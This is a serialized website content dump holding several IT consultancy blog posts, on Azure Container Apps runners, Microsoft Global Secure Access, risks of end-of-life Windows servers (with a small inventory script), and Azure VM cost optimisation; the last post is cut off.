GitHub, Azure DevOps y otros proveedores ponen a disposición agentes públicos en los que se pueden ejecutar los workflows. Estos runners son gestionados por GitHub y se comunican a través de endpoints públicos. Sin embargo, si necesitas acceso a recursos internos o no quieres trabajar en sistemas públicos, estos runners también pueden funcionar en tu propia red.",[12,3201,3202],{},[2772,3203],{"alt":3204,"src":3205},"GitHub Workflow Classic","https://res.cloudinary.com/c4a8/image/upload/v1720794093/blog/pics/azure-workflow-basic.png",[12,3207,3208,3209,3214],{},"Tradicionalmente, para ello se utilizaban máquinas virtuales que funcionaban 24 horas al día, 7 días a la semana. Azure Container Apps ofrece una alternativa rentable y escalable. Mediante el uso de KEDA (",[2630,3210,3213],{"href":3211,"rel":3212},"https://keda.sh/",[3135],"Kubernetes Event Driven Autoscaler","), se establece una conexión con su propio entorno de GitHub. ACA supervisa si se ha iniciado un workflow, inicia un contenedor para ejecutar el workflow y, a continuación, lo elimina de nuevo. Si no se está ejecutando ningún workflow, no se inicia ningún contenedor, lo que mantiene los costes bajos.",[12,3216,3217],{},[2772,3218],{"alt":3219,"src":3220},"GitHub Workflow with Container Apps","https://res.cloudinary.com/c4a8/image/upload/v1720794093/blog/pics/azure-workflow-container-app.png",[12,3222,3223],{},"La escalabilidad de la solución es otra ventaja, ya que se crea una instancia de contenedor independiente para cada workflow. En comparación con una máquina virtual, en la que normalmente solo un agente atiende un workflow, esto ofrece una alternativa flexible y eficiente.",[41,3225,3227],{"id":3226},"resumen","Resumen",[12,3229,31],{},[12,3231,3232],{},"Los contenedores ofrecen una excelente oportunidad para modernizar su propio desarrollo y despliegue de aplicaciones. 
Microsoft Azure, with its broad portfolio of services, offers a suitable solution whether you want to manage it yourself or concentrate entirely on your application.",{"title":65,"searchDepth":111,"depth":111,"links":3234},[3235,3236,3237,3238],{"id":3117,"depth":111,"text":3118},{"id":3166,"depth":111,"text":3167},{"id":3193,"depth":111,"text":3194},{"id":3226,"depth":111,"text":3227},{"lang":2170,"seoTitle":3240,"titleClass":2172,"date":3241,"categories":3242,"blogtitlepic":3244,"socialimg":3245,"customExcerpt":3246,"keywords":3247,"contactInContent":3248,"hreflang":3270,"scripts":3275},"Optimising cloud deployment: container solutions on Azure in detail","2024-07-15",[3243],"Azure","head-containers-on-azure","/blog/heads/head-containers-on-azure.jpg","Faster, more agile, more efficient: container technology is changing the way companies develop and deploy software. Find out how Microsoft Azure serves as a leading platform for hosting containers and how it can significantly improve the agility and scalability of your applications.","Azure Container Solutions, Microsoft Azure, Container Technology, CI/CD Integration, Kubernetes Management, Application Deployment, Cloud Services, Software Development, Scalable Infrastructure, DevOps Tools",{"quote":2167,"infos":3249},{"bgColor":2990,"color":2991,"boxBgColor":2992,"boxColor":2993,"headline":2918,"subline":3250,"level":41,"textStyling":2203,"flush":2204,"person":3251,"form":3259},"Would you like to learn more about containers on Azure? We would be happy to present our approach to you personally and support you with our experience in implementing container solutions. 
We look forward to hearing from you.",{"image":3252,"cloudinary":2180,"alt":3253,"name":3254,"quotee":2499,"details":3255},"/people/team-spain.jpg","Juan Jose Fernandez Perez, Kim Paschke & Christian Segor","Our Spanish team",[3256,3257],{"text":2927,"href":2928,"details":2929,"icon":2815},{"text":2806,"href":3258,"icon":2819},"mailto:sales@glueckkanja.com",{"ctaText":2212,"cta":3260,"method":2168,"action":2215,"fields":3261},{"skin":2214},[3262,3263,3264,3265,3266,3268,3269],{"label":2218,"type":61,"id":2219,"required":2180,"requiredMsg":2825},{"label":2936,"type":61,"id":2223,"required":2180,"requiredMsg":2827},{"label":2829,"type":2227,"id":2227,"required":2180,"requiredMsg":2830},{"label":2939,"type":2236,"id":2237,"required":2180,"requiredMsg":2940},{"type":2240,"id":2246,"value":3267},"Container solutions enquiry",{"type":2240,"id":2249,"value":2250},{"type":2240,"id":2252},[3271,3273],{"lang":2260,"href":3272},"/blog/azure/2024/07/containers-on-azure",{"lang":2257,"href":3274},"/blog/azure/2024/07/containers-on-azure-en",{"slick":2180,"form":2180},"/posts/2024-07-12-containers-on-azure",{"title":3102,"description":3108},"posts/2024-07-12-containers-on-azure",[3243,3280,3281,3282],"Cloud Technology","Development","CI/CD-Workflow","G-3Szptoy4wXnuxdj9d3MSSR7oRXO4NTZHZG4a-ZOdw",{"id":3285,"title":3286,"author":3287,"body":3288,"cta":2165,"description":3402,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":3403,"moment":3405,"navigation":2180,"path":3435,"seo":3436,"stem":3437,"tags":3438,"webcast":2167,"__hash__":3441},"content_es/posts/2024-07-18-gsa-launch-partner.md","glueckkanja is a Microsoft SSE launch partner",[2372],{"type":9,"value":3289,"toc":3397},[3290,3299,3307,3310,3313,3316,3320,3322,3325,3331,3334,3348,3352,3354,3357,3360,3368,3374,3377,3380,3388,3392,3394],[12,3291,3292,3293,3298],{},"glueckkanja has been announced as one of the 
",[2630,3294,3297],{"href":3295,"rel":3296},"https://learn.microsoft.com/es-es/entra/global-secure-access/how-to-find-microsoft-services-partners",[3135],"‘Product Launch Partners’"," for Microsoft's Security Service Edge (SSE) solution, Global Secure Access, which comprises Microsoft Entra Internet Access and Private Access.",[12,3300,3301,3302,3306],{},"With many years of experience in a 100% cloud-based approach, we offer broad support for implementing a consistent Zero Trust design, and ",[2630,3303,3305],{"href":3304},"/es/security/global-secure-access/","Global Secure Access"," fits perfectly into that strategy. It is now a key component of our modern, workplace- and identity-centric security plan, from proof of concept through to managed services.",[12,3308,3309],{},"We have spent years on workplace and security projects, successfully decoupling client devices from the data centre and rolling out cloud-managed clients in a highly efficient and secure way. A modern 100% cloud client does not, however, make legacy environments disappear by itself; it still needs to reach services inside them. In addition, many security teams believe that security capabilities are needed beyond the client, inside the network stack.",[12,3311,3312],{},"Unfortunately, in many projects we saw our Future Workplace clients being connected to data-centre environments through outdated VPN solutions, while various 'Zero Trust' products sat in the path and obstructed the traffic between the clients and Microsoft 365.",[12,3314,3315],{},"We are therefore very pleased to be able to use Entra Private Access from now on, a genuine identity-centric Zero Trust network access for even the most complex data-centre environments, as a replacement for VPN solutions. 
In addition, we will also use Entra Internet Access in our projects, an identity-centric Secure Web Gateway with Conditional Access integration.",[41,3317,3319],{"id":3318},"qué-es-global-secure-access","What is Global Secure Access?",[12,3321,31],{},[12,3323,3324],{},"Global Secure Access is designed to deliver security services from the cloud, with support for managed devices on all major platforms. This includes integration with identity providers and with security tooling such as XDR or SIEM.",[12,3326,3327],{},[2772,3328],{"alt":3329,"src":3330},"GSA Architecture","https://res.cloudinary.com/c4a8/image/upload/v1721295305/blog/pics/gsa-architecture.png",[12,3332,3333],{},"The architecture of the SSE solution is divided into two main areas, each with different components:",[1255,3335,3336,3342],{},[1258,3337,3338,3341],{},[251,3339,3340],{},"Internet Access"," provides an identity-centric Secure Web Gateway (SWG) that works much like a forward proxy. It not only protects against malware and other threats but also performs URL category filtering.",[1258,3343,3344,3347],{},[251,3345,3346],{},"Private Access"," is an identity-centric Zero Trust Network Access (ZTNA) solution that allows granular, consistent access to non-public applications regardless of where they are hosted, enforcing fine-grained, context-based access control.",[41,3349,3351],{"id":3350},"cuál-es-la-diferencia-entre-global-secure-access-y-mi-pasarela-vpn-proxy","What is the difference between Global Secure Access and my VPN gateway / proxy?",[12,3353,31],{},[12,3355,3356],{},"Both Entra Internet Access and Entra Private Access have Conditional Access integration, which allows strong authentication and device-compliance enforcement, including the Microsoft Defender for Endpoint integration, at the authentication layer. 
Microsoft is also working on additional enforcement at the data layer through Continuous Access Evaluation (CAE), to address advanced token-theft scenarios.",[12,3358,3359],{},"Even the newer VPN gateways usually only cover the user's initial authentication via RADIUS or SAML, granting access to the environment, often for an extended period, regardless of whether the user or the client is later implicated in a security incident. This once-authenticated access generally applies to the entire internal network, with the same rule set for every user.",[2109,3361,3362],{},[12,3363,3364,3367],{},[251,3365,3366],{},"Entra Private Access"," is designed to group individual network segments into Enterprise Apps and then assign, authenticate and restrict users per app with Conditional Access.",[12,3369,3370],{},[2772,3371],{"alt":3372,"src":3373},"Full Tunnel vs App based Tunnel","https://res.cloudinary.com/c4a8/image/upload/v1721295307/blog/pics/tunnel-comparison.png",[12,3375,3376],{},"In my experience, the main problem with secure web gateways is their poor integration with identity providers. While early versions brought ADFS farms to their knees with excessive SAML requests and caused massive outages, vendors have since moved to a single authentication after which they work with their own long-lived cookies.",[12,3378,3379],{},"The second major problem is excluding Microsoft URLs and IPs from the proxy rule set. Traffic between the client and trusted services such as M365 simply does not need a proxy, and forcing it through one in practice leads to a variety of problems and performance degradation. 
I have yet to see a vendor where this works flawlessly.",[2109,3381,3382],{},[12,3383,3384,3387],{},[251,3385,3386],{},"Entra Internet Access"," is part of the most widely used enterprise cloud identity provider and has a very solid Conditional Access integration.",[41,3389,3391],{"id":3390},"quieres-saber-más","Want to know more?",[12,3393,31],{},[12,3395,3396],{},"We have broad experience in identity, security, workplace and networking. With Global Secure Access we bring all of these together. Say goodbye to outdated VPN and web proxy solutions and get the most out of Microsoft's SSE solution. We look forward to hearing from you.",{"title":65,"searchDepth":111,"depth":111,"links":3398},[3399,3400,3401],{"id":3318,"depth":111,"text":3319},{"id":3350,"depth":111,"text":3351},{"id":3390,"depth":111,"text":3391},"glueckkanja has been announced as one of the ‘Product Launch Partners’ for Microsoft's Security Service Edge (SSE) solution, Global Secure Access, which comprises Microsoft Entra Internet Access and Private Access.",{"lang":2170,"seoTitle":3404,"titleClass":2172,"date":3405,"categories":3406,"blogtitlepic":3407,"socialimg":3408,"customExcerpt":3409,"keywords":3410,"contactInContent":3411,"hreflang":3429,"scripts":3434},"glueckkanja is a Product Launch Partner for Microsoft's Security Service Edge (SSE) solution","2024-07-18",[2175],"head-global-secure-access","/blog/heads/head-global-secure-access.jpg","We are pleased to announce our role as a ‘Product Launch Partner’ for Microsoft's Security Service Edge (SSE) solution, Global Secure Access, which comprises Microsoft Entra Internet Access and Private Access. 
Our collaboration with Microsoft in several private previews has refined these features to benefit not only our teams but also our customers, integrating their needs into a secure and seamless cloud experience. Discover how our experience with a 100% cloud-based approach and Zero Trust design is transforming the modern workplace and identity-centric security.","Global Secure Access, SSE, Microsofts SSE, Private Access, Internet Access, VPN replacement, Zero Trust Network Access, Network security",{"quote":2167,"infos":3412},{"bgColor":2990,"color":2991,"boxBgColor":2992,"boxColor":2993,"headline":2918,"subline":3413,"level":41,"textStyling":2203,"flush":2204,"person":3414,"form":3418},"Would you like to learn more about Microsoft's SSE solution? We would be happy to present our approach to you personally and support you with our experience during the implementation. We look forward to hearing from you.",{"image":3252,"cloudinary":2180,"alt":3253,"name":3254,"quotee":2499,"details":3415},[3416,3417],{"text":2927,"href":2928,"details":2929,"icon":2815},{"text":2806,"href":3258,"icon":2819},{"ctaText":2212,"cta":3419,"method":2168,"action":2215,"fields":3420},{"skin":2214},[3421,3422,3423,3424,3425,3427,3428],{"label":2218,"type":61,"id":2219,"required":2180,"requiredMsg":2825},{"label":2936,"type":61,"id":2223,"required":2180,"requiredMsg":2827},{"label":2829,"type":2227,"id":2227,"required":2180,"requiredMsg":2830},{"label":2939,"type":2236,"id":2237,"required":2180,"requiredMsg":2940},{"type":2240,"id":2246,"value":3426},"Global Secure 
Access enquiry",{"type":2240,"id":2249,"value":2250},{"type":2240,"id":2252},[3430,3432],{"lang":2260,"href":3431},"/blog/security/2024/07/gsa-launch-partner",{"lang":2257,"href":3433},"/blog/security/2024/07/gsa-launch-partner-en",{"slick":2180,"form":2180},"/posts/2024-07-18-gsa-launch-partner",{"title":3286,"description":3402},"posts/2024-07-18-gsa-launch-partner",[3305,3439,3440,2175],"Zero Trust","VPN Replacement","8DjrA18s1FR2OuZNI3ZEntykApjx1hA4EB2Ak6Mmquo",{"id":3443,"title":3444,"author":3445,"body":3446,"cta":2165,"description":65,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":3733,"moment":3734,"navigation":2180,"path":3764,"seo":3765,"stem":3766,"tags":3767,"webcast":2167,"__hash__":3773},"content_es/posts/2024-10-17-end-of-support-operating-systems.md","Why outdated Windows servers put your company at risk",[2514],{"type":9,"value":3447,"toc":3721},[3448,3452,3454,3457,3460,3464,3466,3472,3478,3481,3489,3493,3495,3498,3511,3514,3517,3520,3524,3526,3530,3532,3535,3544,3550,3554,3556,3559,3562,3573,3579,3585,3591,3595,3597,3602,3605,3612,3620,3624,3626,3629,3632,3635,3638,3642,3644,3647,3650,3700,3706,3709,3712,3715],[41,3449,3451],{"id":3450},"servidor-windows-vs-avión","Windows Server vs aircraft",[12,3453,31],{},[12,3455,3456],{},"Imagine boarding an aircraft that has not been serviced for a long time and has more than 35 critical technical defects. Would you feel safe? Now think about your Windows Server 2012 R2. It is essentially that outdated aircraft: full of vulnerabilities, except that this time your company's infrastructure is at stake.",[12,3458,3459],{},"It is time to act, do not waste any time. 
Your flight is booked, but it is seriously at risk.",[41,3461,3463],{"id":3462},"comprende-las-implicaciones-de-seguridad-y-los-posibles-impactos","Understand the security implications and possible impacts",[12,3465,31],{},[12,3467,3468,3471],{},[251,3469,3470],{},"Impact on the Security ScoreCard:"," systems that have reached end-of-life (EOL) significantly affect your Security ScoreCard.",[12,3473,3474,3477],{},[251,3475,3476],{},"Massive risk:"," these systems are extremely vulnerable to attack because the vendor no longer provides updates or support, and they pose a serious threat to the entire corporate network.",[12,3479,3480],{},"Attackers love EOL operating systems: they are open invitations to infiltrate your network, and that can lead to a complete compromise of the infrastructure.",[12,3482,3483,3484,3488],{},"Although our ",[2630,3485,3487],{"href":3486},"/es/security/are-you-under-attack/","APT response services"," (in emergencies) can help you recover, we always recommend a proactive approach so that it never gets that far.",[41,3490,3492],{"id":3491},"identifica-los-sistemas-eol-en-tu-organización","Identify the EOL systems in your organisation",[12,3494,31],{},[12,3496,3497],{},"Discovery and methods for identifying EOL operating systems",[12,3499,3500,3501,3505,3506,3510],{},"Start with discovery. We frequently detect EOL operating systems during our assessments, either through ",[2630,3502,3504],{"href":3503},"/es/security/preventive-services/","preventive services"," such as our AD/EID assessments or through our managed ",[2630,3507,3509],{"href":3508},"/es/security/cloud-security-operations-center/","CSOC offerings"," (Cloud Security Operations Center). 
The first step in addressing the problem is to develop reliable methods for identifying EOL systems and to act on the findings.\nIt is crucial to establish a strategy for identifying these outdated systems on a regular basis using a range of tools and assessments. We can work with you to implement this effectively.",[12,3512,3513],{},"A key step is to identify your line-of-business (LOB) applications and determine where they run, so that they stay aligned with your business needs. The risk-based LOB triangle is a valuable tool for uncovering dependencies and assessing risk across the organisation.",[12,3515,3516],{},"By analysing loss patterns and volatility over time, this approach becomes a cornerstone of effective risk management and gives your management team essential insight. This is especially critical when highly sensitive LOBs, those at the top of the triangle, run on EOL systems. 
Such systems pose a significant threat to service continuity, operational stability and the overall performance of the business.",[12,3518,3519],{},"In short, if your most critical LOBs run on EOL systems, you are exposing the company to the risk of service interruptions and heightened operational hazards.",[41,3521,3523],{"id":3522},"construir-una-estrategia-de-sistema-operativo-anticuada","Build a strategy for outdated operating systems",[12,3525,31],{},[186,3527,3529],{"id":3528},"solución-a-corto-plazo-la-esu-podría-ser-la-solución","Short-term fix: ESU may be the answer",[12,3531,47],{},[12,3533,3534],{},"Protect yourself with a short-term fix while you develop a long-term strategy for dealing with EOL and end-of-support (EOS) systems.",[12,3536,3537,3538,3543],{},"Use ",[2630,3539,3542],{"href":3540,"rel":3541},"https://www.microsoft.com/en-us/windows-server/extended-security-updates",[3135],"Extended Security Updates (ESU)"," as a lifeline to get through this challenging period. ESU can temporarily protect EOL systems until migration or decommissioning is complete. Remember that this is a short-term solution.",[12,3545,3546,3549],{},[251,3547,3548],{},"Isolation:"," Fully isolate these systems from the networks and from Active Directory during the transition period. This buys you the time to plan and execute your migration without exposing yourself to serious risk, and turns the situation into a more controllable one.",[186,3551,3553],{"id":3552},"crear-una-estrategia-a-largo-plazo","Build a long-term strategy",[12,3555,47],{},[12,3557,3558],{},"Once the immediate concerns are covered by ESU, it is time to shift the focus to a long-term strategy for eliminating legacy systems. 
Take a moment to evaluate the long-term options that best fit your needs.",[12,3560,3561],{},"Consider migrating to modern operating systems, serverless approaches, Software as a Service (SaaS) or any cloud-native solution that suits your environment.",[12,3563,3564,3567,3568,3572],{},[251,3565,3566],{},"Migration:"," Plan and carry out the upgrade of outdated systems to current versions. Evaluate alternatives such as serverless, containers or Kubernetes (K8s). glueckkanja's ",[2630,3569,3571],{"href":3570},"/en/azure/migrate-to-the-cloud","Azure Foundation Blueprint"," provides a solid framework for your cloud migration. By deploying it as infrastructure as code, we ensure a fast roll-out at the highest quality. Security and governance requirements are built directly into the platform, and built-in controls such as policies and automation replace outdated and expensive processes and workflows.",[12,3574,3575,3578],{},[251,3576,3577],{},"Decommissioning:"," Decommission unsupported systems securely. By following this approach you mitigate the immediate risks while planning sustainable long-term security improvements. If you need more details or assistance, do not hesitate to contact us.",[12,3580,3581,3584],{},[251,3582,3583],{},"Long-term goal:"," Going forward, make sure you are prepared well in advance of your systems reaching EOL.",[12,3586,3587,3590],{},[251,3588,3589],{},"Contact our Azure experts:"," Plan and execute a successful cloud migration with our guidance. glueckkanja holds the Azure advanced specialisation for infrastructure and database migration. 
Customers can also take advantage of the Azure Migrate and Modernize (AMM) programme for comprehensive migration support.",[41,3592,3594],{"id":3593},"conoce-el-ciclo-de-vida-del-soporte-del-sistema-operativo","Know the operating system support lifecycle",[12,3596,31],{},[12,3598,3599],{},[251,3600,3601],{},"Regularly review the support lifecycle and deadlines of every operating system (OS) to ensure compliance and manage risk proactively.",[12,3603,3604],{},"Microsoft provides consistent and predictable guidance for its products, whether it is the server OS, the client OS or other products such as Exchange, SQL Server and many more.",[12,3606,3607,3608,1014],{},"This makes strategic planning for the future possible. Always stay informed about the OS support lifecycle and software support. Regular reviews help you stay compliant and manage risk proactively. With Defender for Endpoint these reviews become simpler. Monitoring vulnerabilities and identifying EOL systems are integral parts of our ",[2630,3609,3611],{"href":3610},"/en/security/cloud-security-operations-center","CSOC service",[12,3613,3614,3615],{},"Get an overview of the ",[2630,3616,3619],{"href":3617,"rel":3618},"https://learn.microsoft.com/en-us/lifecycle/",[3135],"Microsoft Lifecycle Policy.",[41,3621,3623],{"id":3622},"conclusión-no-esperes-a-que-la-prensa-escriba-tu-historia","Conclusion: do not wait for the press to write your story",[12,3625,31],{},[12,3627,3628],{},"The message is loud and clear: do not wait for service interruptions or compromises to happen.\nWe hope to see only positive news about your company in the press. 
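The lifecycle review the section describes, carried out over a device inventory, as an added example that is not the post's own code and not part of Defender for Endpoint: the inventory rows are a constructed sample in the shape of a DeviceInfo advanced-hunting export (the DeviceName, OSPlatform and OSVersion columns), the end-of-extended-support dates in the table are the ones published on the Microsoft Lifecycle page and should be re-checked there before use, and the as-of date is passed in explicitly so the result is reproducible. One caveat the code encodes: an OS the table does not know is reported as unknown rather than treated as supported, because an unmaintained lookup table is itself a way for EOL hosts to slip through.

```python
"""Added example: flag devices whose OS is past (or close to) Microsoft's end of
extended support. Not the post's code; inventory rows are constructed."""
import csv
import io
from datetime import date, timedelta

# End of extended support: after this date there are no security updates
# without ESU. Dates as published on the Microsoft Lifecycle page; verify there.
END_OF_SUPPORT = {
    "WindowsServer2008R2": date(2020, 1, 14),
    "WindowsServer2012R2": date(2023, 10, 10),
    "WindowsServer2016": date(2027, 1, 12),
    "WindowsServer2019": date(2029, 1, 9),
    "WindowsServer2022": date(2031, 10, 14),
}

# Constructed export. A real one would come from an advanced-hunting query like:
#   DeviceInfo
#   | summarize arg_max(Timestamp, *) by DeviceId
#   | project DeviceName, OSPlatform, OSVersion
SAMPLE_INVENTORY = """DeviceName,OSPlatform,OSVersion
erp-db01,WindowsServer2012R2,6.3
dc01,WindowsServer2019,10.0
legacy-app02,WindowsServer2008R2,6.1
file01,WindowsServer2016,10.0
web03,WindowsServer2022,10.0
"""


def classify(platform: str, today_iso: str, warn_days: int = 365) -> str:
    """'eol' = past end of support, 'expiring' = within warn_days of it,
    'supported', or 'unknown' when the platform is not in the table. Unknown is
    deliberately not treated as safe: it usually means an OS nobody added."""
    today = date.fromisoformat(today_iso)
    end = END_OF_SUPPORT.get(platform)
    if end is None:
        return "unknown"
    if today >= end:
        return "eol"
    if today + timedelta(days=warn_days) >= end:
        return "expiring"
    return "supported"


def eol_report(inventory_csv: str, today_iso: str) -> list[dict]:
    """One row per device, worst first: the hosts that have been unsupported the
    longest are the ones to isolate or retire first."""
    today = date.fromisoformat(today_iso)
    report = []
    for row in csv.DictReader(io.StringIO(inventory_csv)):
        platform = row["OSPlatform"]
        end = END_OF_SUPPORT.get(platform)
        past = (today - end).days if end is not None and today >= end else 0
        report.append({
            "device": row["DeviceName"],
            "platform": platform,
            "status": classify(platform, today_iso),
            "days_past_eos": past,
        })
    return sorted(report, key=lambda r: r["days_past_eos"], reverse=True)


if __name__ == "__main__":
    # As-of date chosen to match the figures quoted in the post's appendix.
    for entry in eol_report(SAMPLE_INVENTORY, "2024-09-30"):
        print(entry)
```

Run against a real export, the `days_past_eos` column is the argument to put in front of management: a host more than four years past end of support is not a patching backlog, it is an unpatched attack surface with a known exploit history.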
Although we offer APT response services, we strongly encourage you, and all of our customers, to contact us proactively rather than reacting to a security breach.",[12,3630,3631],{},"The essence of this article is to urge you to move from a reactive posture to preparing your business for the next level. Future-proof your organisation by keeping platforms up to date or adopting cloud-native solutions. All stakeholders, including your customers and executives, will appreciate this proactive approach.",[12,3633,3634],{},"Business leadership in particular must be fully aware of its responsibilities and obligations to ensure the operational stability and security of the company.",[12,3636,3637],{},"Take advantage of our Azure, Workplace and Security solutions: do not hesitate to get in touch!",[41,3639,3641],{"id":3640},"apéndice-windows-server-2012-r2-windows-server-2008-r2-número-de-vulnerabilidades","Appendix - Windows Server 2012 R2 - Windows Server 2008 R2 - number of vulnerabilities",[12,3643,31],{},[12,3645,3646],{},"The table below highlights the known vulnerabilities, which keep increasing by more than 20 every month.",[2126,3648,3649],{},"\ntable {\n  font-family: arial, sans-serif;\n  border-collapse: collapse;\n  width: 100%;\n}\n\ntd, th {\n  border: 1px solid #dddddd;\n  text-align: left;\n  padding: 8px;\n}\n\ntr:nth-child(even) {\n  background-color: #dddddd;\n}\n",[417,3651,420,3652],{},[438,3653,3654,420,3665,420,3677,420,3689],{},[426,3655,424,3656,424,3659,424,3662,420],{},[430,3657,3658],{},"Operating System",[430,3660,3661],{},"Windows Server 2012 R2",[430,3663,3664],{},"Windows Server 2008 R2",[426,3666,424,3667,424,3670,424,3674,420],{},[443,3668,3669],{},"Total # of Vulnerabilities*",[443,3671,3673],{"style":3672},"text-align: 
center;","1,142",[443,3675,3676],{"style":3672},"2,240",[426,3678,424,3679,424,3682,424,3686,420],{},[443,3680,3681],{},"Critical",[443,3683,3685],{"style":3684},"text-align: center; color: red;","35",[443,3687,3688],{"style":3684},"47",[426,3690,424,3691,424,3694,424,3697,420],{},[443,3692,3693],{},"High",[443,3695,3696],{"style":3672},"806",[443,3698,3699],{"style":3672},"1,457",[12,3701,3702],{},[3703,3704,3705],"small",{},"* Data as of September 2024, with the number of vulnerabilities growing month by month.",[12,3707,3708],{},"As of September 2024, Windows Server 2012 R2 has 1,142 vulnerabilities (see point 1) that remain unaddressed or unpatched. This number keeps growing month by month, with 35 rated critical and 806 rated high severity (see point 2).",[12,3710,3711],{},"The situation is even more worrying for Windows Server 2008 R2, which carries an even larger number of known vulnerabilities. This creates a tempting opportunity for attackers and offers them a clear path to a possible compromise.",[12,3713,3714],{},"These figures come from Microsoft Defender for Endpoint, which provides a comprehensive view and valuable insight into system vulnerabilities.",[12,3716,3717],{},[2772,3718],{"alt":3719,"src":3720},"Microsoft Defender for Endpoint 
Vulnerabilities","https://res.cloudinary.com/c4a8/image/upload/blog/pics/defender-portal-vulnerabilites.png",{"title":65,"searchDepth":111,"depth":111,"links":3722},[3723,3724,3725,3726,3730,3731,3732],{"id":3450,"depth":111,"text":3451},{"id":3462,"depth":111,"text":3463},{"id":3491,"depth":111,"text":3492},{"id":3522,"depth":111,"text":3523,"children":3727},[3728,3729],{"id":3528,"depth":329,"text":3529},{"id":3552,"depth":329,"text":3553},{"id":3593,"depth":111,"text":3594},{"id":3622,"depth":111,"text":3623},{"id":3640,"depth":111,"text":3641},{"lang":2170,"seoTitle":3444,"titleClass":2172,"date":3734,"categories":3735,"blogtitlepic":3736,"socialimg":3737,"customExcerpt":3738,"keywords":3410,"contactInContent":3739,"hreflang":3758,"scripts":3763},"2024-10-17",[2175],"head-end-of-support","/blog/heads/head-end-of-support.jpg","Would you trust an aircraft with critical defects to get you safely to your destination? Then why trust your Windows Server 2012 R2 when your organisation's security is at stake? With more than 35 critical vulnerabilities, outdated systems may be the biggest risk your organisation faces. Learn how to protect your infrastructure before it is too late, because in today's threat landscape there is no room for error.",{"quote":2167,"infos":3740},{"bgColor":3741,"color":2993,"boxBgColor":3742,"boxColor":2991,"headline":2918,"subline":3743,"level":41,"textStyling":2203,"flush":2204,"person":3744,"form":3748},"var(--color-gigas)","var(--color-yellow)","Would you like to learn more about End-of-Life (EOL) and End-of-Support (EOS) systems? Do not hesitate to contact us! 
We look forward to your message!",{"image":3252,"cloudinary":2180,"alt":3253,"name":3254,"quotee":2499,"details":3745},[3746,3747],{"text":2927,"href":2928,"details":2929,"icon":2815},{"text":2806,"href":3258,"icon":2819},{"ctaText":2212,"cta":3749,"method":2168,"action":2215,"fields":3750},{"skin":2214},[3751,3752,3753,3754,3755,3756,3757],{"label":2218,"type":61,"id":2219,"required":2180,"requiredMsg":2825},{"label":2936,"type":61,"id":2223,"required":2180,"requiredMsg":2827},{"label":2829,"type":2227,"id":2227,"required":2180,"requiredMsg":2830},{"label":2939,"type":2236,"id":2237,"required":2180,"requiredMsg":2940},{"type":2240,"id":2246,"value":3267},{"type":2240,"id":2249,"value":2250},{"type":2240,"id":2252},[3759,3761],{"lang":2260,"href":3760},"/blog/security/2024/10/end-of-support-operating-systems-de",{"lang":2257,"href":3762},"/blog/security/2024/10/end-of-support-operating-systems-en",{"slick":2180,"form":2180},"/posts/2024-10-17-end-of-support-operating-systems",{"title":3444,"description":65},"posts/2024-10-17-end-of-support-operating-systems",[3768,3769,3770,3771,3772],"Cyber Security","Windows Server","Security Risk","Vulnerability Management","Security Score","cxQEsVesijycRyhPconWu7DHHCtszwA_A3Yg7OLh60g",{"id":3775,"title":3776,"author":3777,"body":3778,"cta":2165,"description":3784,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":4056,"moment":4058,"navigation":2180,"path":4070,"seo":4071,"stem":4072,"tags":4073,"webcast":2167,"__hash__":4077},"content_es/posts/2024-11-11-vm-cost-optimization-on-azure.md","How to keep the cost of your Azure VMs under control",[2509],{"type":9,"value":3779,"toc":4046},[3780,3785,3788,3792,3794,3797,3800,3814,3820,3824,3826,3829,3840,3843,3846,3855,3864,3868,3870,3873,3877,3879,3882,3885,3893,3899,3907,3912,3921,3927,3931,3933,3936,3944,3949,3957,3968,3976,3993,3997,3999,4002,4016,4022,4025,4028,4033,4036,4040,4043],[12,3781,3782],{},[251,3783,3784],{},"\"Why do my virtual 
machines (VMs) in Azure cost so much? I thought the cloud was cheaper!\"",[12,3786,3787],{},"This is a comment we hear frequently from our customers, especially those who moved their IT infrastructure to the cloud with a \"lift & shift\" approach and made no adjustments. Without the right optimisations the cloud can turn out to be more expensive than expected.",[41,3789,3791],{"id":3790},"realmente-necesitas-una-vm","Do you really need a VM?",[12,3793,31],{},[12,3795,3796],{},"This is the first question you should ask yourself: does the task really require a VM, or would a cloud-native service such as Azure Functions or a Kubernetes cluster be a better fit?",[12,3798,3799],{},"There are, however, good reasons to choose a VM:",[1255,3801,3802,3805,3808,3811],{},[1258,3803,3804],{},"Software vendor requirements",[1258,3806,3807],{},"Lack of in-house knowledge to modernise applications",[1258,3809,3810],{},"Staff shortages",[1258,3812,3813],{},"Other specific needs",[12,3815,3816,3817,3819],{},"So how do you optimise costs when a VM cannot be avoided?",[531,3818],{},"\nBelow we present effective strategies.",[41,3821,3823],{"id":3822},"principales-factores-que-influyen-en-los-costos-de-las-vms","Main factors that drive VM costs",[12,3825,31],{},[12,3827,3828],{},"VM costs in Azure are mainly determined by the following factors:",[1255,3830,3831,3834,3837],{},[1258,3832,3833],{},"Running time",[1258,3835,3836],{},"Assigned SKU (VM size)",[1258,3838,3839],{},"Operating system licences",[12,3841,3842],{},"The main cost comes from the resources consumed while the VM runs. As long as a VM is running and has CPU and RAM allocated, it generates cost, regardless of whether it is fully utilised or idle. 
When a VM is deallocated, costs are limited to the storage it uses. Note that a VM that is merely shut down from inside the guest OS is still allocated and still billed for compute; it has to be stopped and deallocated through Azure.",[12,3844,3845],{},"Every VM in Azure is associated with a specific SKU, which describes its configuration in terms of CPU and RAM. Different SKUs are optimised for different usage scenarios, for example a high ratio of CPU cores to RAM for compute-intensive workloads.",[12,3847,3848,3849,3851,3854],{},"The SKU name usually tells you about its configuration.",[531,3850],{},[251,3852,3853],{},"Example:"," A D-series VM is designed for a balance of CPU and RAM, typically 4 GB of RAM per CPU core. Standard_D4s_v5, for instance, offers 4 CPU cores and 16 GB of RAM. The \"s\" indicates support for premium SSD storage.",[12,3856,3857,3858,3863],{},"Microsoft offers a ",[2630,3859,3862],{"href":3860,"rel":3861},"https://learn.microsoft.com/es-es/azure/virtual-machines/sizes/overview?tabs=breakdownseries%2Cgeneralsizelist%2Ccomputesizelist%2Cmemorysizelist%2Cstoragesizelist%2Cgpusizelist%2Cfpgasizelist%2Chpcsizelist",[3135],"complete list"," of all available SKUs, with details of their performance.",[41,3865,3867],{"id":3866},"cómo-optimizar-los-costos-de-las-vms","How to optimise VM costs",[12,3869,31],{},[12,3871,3872],{},"To reduce VM costs, consider analysing the following 